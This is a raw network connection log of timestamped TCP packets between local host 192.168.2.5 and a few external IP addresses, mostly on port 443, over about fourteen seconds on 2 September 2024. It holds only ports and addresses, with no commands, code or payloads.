Sep 2, 2024 16:51:10.880021095 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.880028009 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.880043983 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.880049944 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.880060911 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.880070925 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.880089998 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.880089998 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.880100965 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.880108118 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.880122900 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.880129099 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.880143881 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.880150080 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.880172968 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.880183935 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.880201101 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.880201101 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.880220890 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.880229950 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.880248070 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.880263090 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.880270004 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.880285025 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.880314112 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.880336046 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.880371094 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.880382061 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.880389929 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.880419970 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.880454063 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.880467892 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.884675026 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.884820938 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.884834051 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.884851933 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.884869099 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.884884119 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.884893894 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.884910107 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.884916067 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.884932041 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.884943008 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:10.894603968 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:10.920578003 CEST	443	56217	185.199.108.133	192.168.2.5
Sep 2, 2024 16:51:10.920639038 CEST	56217	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:51:10.921880007 CEST	56217	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:51:10.921886921 CEST	443	56217	185.199.108.133	192.168.2.5
Sep 2, 2024 16:51:10.922089100 CEST	443	56217	185.199.108.133	192.168.2.5
Sep 2, 2024 16:51:10.937203884 CEST	56217	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:51:10.984493971 CEST	443	56217	185.199.108.133	192.168.2.5
Sep 2, 2024 16:51:11.069938898 CEST	443	56217	185.199.108.133	192.168.2.5
Sep 2, 2024 16:51:11.070044994 CEST	443	56217	185.199.108.133	192.168.2.5
Sep 2, 2024 16:51:11.070087910 CEST	56217	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:51:11.073630095 CEST	56217	443	192.168.2.5	185.199.108.133
Sep 2, 2024 16:51:11.132519960 CEST	443	56218	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:11.133505106 CEST	56218	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:11.133522987 CEST	443	56218	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:11.390081882 CEST	443	56218	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:11.390167952 CEST	443	56218	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:11.390245914 CEST	56218	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:11.390645027 CEST	56218	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:11.873796940 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:11.873815060 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:11.873879910 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:11.873903036 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:11.873914003 CEST	443	56216	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:11.873946905 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:11.874440908 CEST	56216	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.318274975 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.318353891 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.318455935 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.399261951 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.399296999 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.431561947 CEST	56220	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.431610107 CEST	443	56220	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.431701899 CEST	56220	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.432003975 CEST	56220	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.432032108 CEST	443	56220	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.987638950 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.988472939 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.988500118 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.989386082 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.989451885 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.992928982 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.992974997 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.993199110 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.993204117 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.993273973 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.993292093 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.993366003 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.993380070 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.993382931 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.993416071 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.993524075 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.993545055 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.993680000 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.993691921 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.993717909 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.993725061 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.993805885 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.993815899 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.993830919 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.993837118 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.993855000 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.993860960 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.993870974 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.993876934 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.993887901 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.993891954 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.993906975 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.993911982 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.993916035 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.993920088 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.993940115 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.993949890 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.993956089 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.993963957 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.993967056 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.993978977 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.993983030 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.993999958 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.994005919 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.994012117 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.994052887 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.994057894 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.994067907 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.994072914 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.994081974 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.994085073 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.994101048 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.994105101 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.994116068 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.994121075 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.994124889 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.994131088 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.994134903 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.994149923 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.994153976 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:12.994167089 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.994179964 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.994216919 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.994247913 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.994293928 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:12.994303942 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.003757000 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:13.003946066 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.003952980 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:13.003972054 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.004021883 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.004033089 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.004055023 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.004061937 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.004075050 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.008620024 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:13.008725882 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.008740902 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:13.008744001 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.008749962 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:13.008759022 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.008766890 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:13.008773088 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.008778095 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:13.008784056 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.008790970 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.008845091 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.008858919 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.008867025 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.008876085 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.008910894 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.009255886 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:13.009335995 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.009349108 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:13.009356976 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.009361982 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:13.009370089 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.009378910 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.009385109 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:13.009397984 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.009397984 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.009411097 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:13.048501968 CEST	443	56220	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:13.049557924 CEST	56220	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.049578905 CEST	443	56220	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:13.302344084 CEST	443	56220	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:13.302721024 CEST	443	56220	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:13.302813053 CEST	56220	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.303088903 CEST	56220	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.839751959 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:13.840198040 CEST	443	56219	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:13.840270042 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:13.840497971 CEST	56219	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:14.055293083 CEST	56215	80	192.168.2.5	208.95.112.1
Sep 2, 2024 16:51:14.065753937 CEST	80	56215	208.95.112.1	192.168.2.5
Sep 2, 2024 16:51:14.065814972 CEST	56215	80	192.168.2.5	208.95.112.1
Sep 2, 2024 16:51:14.318372011 CEST	56221	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:14.318428040 CEST	443	56221	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:14.318490028 CEST	56221	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:14.318948030 CEST	56221	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:14.318958998 CEST	443	56221	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:15.276460886 CEST	443	56221	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:15.280091047 CEST	56221	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:15.280117035 CEST	443	56221	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:15.526253939 CEST	443	56221	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:15.526334047 CEST	443	56221	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:15.526426077 CEST	56221	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:15.527170897 CEST	56221	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:15.611603022 CEST	56222	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:15.611654043 CEST	443	56222	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:15.611778021 CEST	56222	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:15.612133980 CEST	56222	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:15.612144947 CEST	443	56222	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:16.205255985 CEST	443	56222	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:16.205327988 CEST	56222	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:16.206540108 CEST	56222	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:16.206549883 CEST	443	56222	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:16.206741095 CEST	443	56222	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:16.207981110 CEST	56222	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:16.252496004 CEST	443	56222	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:16.522109032 CEST	443	56222	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:16.522183895 CEST	443	56222	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:16.522351980 CEST	56222	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:16.522759914 CEST	56222	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:16.526367903 CEST	56223	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:16.526402950 CEST	443	56223	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:16.526469946 CEST	56223	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:16.526690960 CEST	56223	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:16.526706934 CEST	443	56223	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:16.541812897 CEST	56224	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:16.541852951 CEST	443	56224	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:16.541910887 CEST	56224	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:16.542093992 CEST	56224	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:16.542104959 CEST	443	56224	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:17.115931988 CEST	443	56223	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:17.117230892 CEST	56223	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:17.117260933 CEST	443	56223	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:17.137063980 CEST	443	56224	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:17.138504028 CEST	56224	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:17.138534069 CEST	443	56224	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:17.524585009 CEST	443	56223	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:17.524597883 CEST	443	56224	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:17.524666071 CEST	443	56224	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:17.524677038 CEST	443	56223	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:17.524802923 CEST	56223	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:17.524801970 CEST	56224	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:17.525279045 CEST	56223	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:17.525580883 CEST	56224	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:18.541774988 CEST	56226	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:18.541809082 CEST	443	56226	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:18.541894913 CEST	56226	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:18.542179108 CEST	56226	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:18.542191982 CEST	443	56226	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:18.542310953 CEST	56227	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:18.542359114 CEST	443	56227	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:18.542525053 CEST	56227	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:18.542845011 CEST	56227	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:18.542860031 CEST	443	56227	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:19.128504038 CEST	443	56227	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:19.130542040 CEST	443	56226	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:19.131412029 CEST	56226	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:19.131417036 CEST	56227	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:19.131444931 CEST	443	56226	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:19.131452084 CEST	443	56227	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:19.382972956 CEST	443	56227	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:19.383037090 CEST	443	56226	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:19.383064032 CEST	443	56227	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:19.383088112 CEST	443	56226	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:19.383115053 CEST	56227	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:19.383120060 CEST	56226	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:19.383444071 CEST	56227	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:19.383459091 CEST	56226	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:20.385534048 CEST	56230	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:20.385588884 CEST	443	56230	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:20.385682106 CEST	56230	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:20.386348009 CEST	56230	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:20.386365891 CEST	443	56230	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:20.386811018 CEST	56231	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:20.386838913 CEST	443	56231	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:20.386892080 CEST	56231	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:20.387301922 CEST	56231	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:20.387314081 CEST	443	56231	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:20.995707035 CEST	443	56230	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:20.998683929 CEST	443	56231	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:21.026684999 CEST	56230	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:21.026717901 CEST	443	56230	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:21.027223110 CEST	56231	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:21.027240992 CEST	443	56231	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:21.242940903 CEST	443	56230	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:21.243032932 CEST	443	56230	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:21.243155003 CEST	56230	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:21.243701935 CEST	56230	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:21.247509956 CEST	443	56231	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:21.247565985 CEST	443	56231	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:21.247668028 CEST	56231	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:21.248066902 CEST	56231	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:22.245132923 CEST	56233	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:22.245167017 CEST	443	56233	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:22.245227098 CEST	56233	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:22.245580912 CEST	56233	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:22.245594025 CEST	443	56233	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:22.260318995 CEST	56234	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:22.260327101 CEST	443	56234	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:22.260396957 CEST	56234	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:22.260607958 CEST	56234	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:22.260618925 CEST	443	56234	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:22.840281963 CEST	443	56233	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:22.841473103 CEST	56233	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:22.841519117 CEST	443	56233	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:22.852890015 CEST	443	56234	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:22.853938103 CEST	56234	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:22.853955030 CEST	443	56234	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:23.089541912 CEST	443	56233	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:23.089616060 CEST	443	56233	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:23.089700937 CEST	56233	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:23.090055943 CEST	56233	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:23.099622011 CEST	443	56234	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:23.099693060 CEST	443	56234	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:23.099744081 CEST	56234	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:23.100251913 CEST	56234	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:24.106061935 CEST	56236	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:24.106105089 CEST	443	56236	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:24.106203079 CEST	56236	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:24.106470108 CEST	56236	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:24.106483936 CEST	443	56236	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:24.106585026 CEST	56237	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:24.106621981 CEST	443	56237	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:24.106673956 CEST	56237	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:24.106828928 CEST	56237	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:24.106837988 CEST	443	56237	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:24.912570000 CEST	443	56237	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:24.912858009 CEST	443	56236	149.154.167.220	192.168.2.5
Sep 2, 2024 16:51:24.916168928 CEST	56236	443	192.168.2.5	149.154.167.220
Sep 2, 2024 16:51:24.916198969 CEST	443	56236	149.154.167.220	192.168.2.5
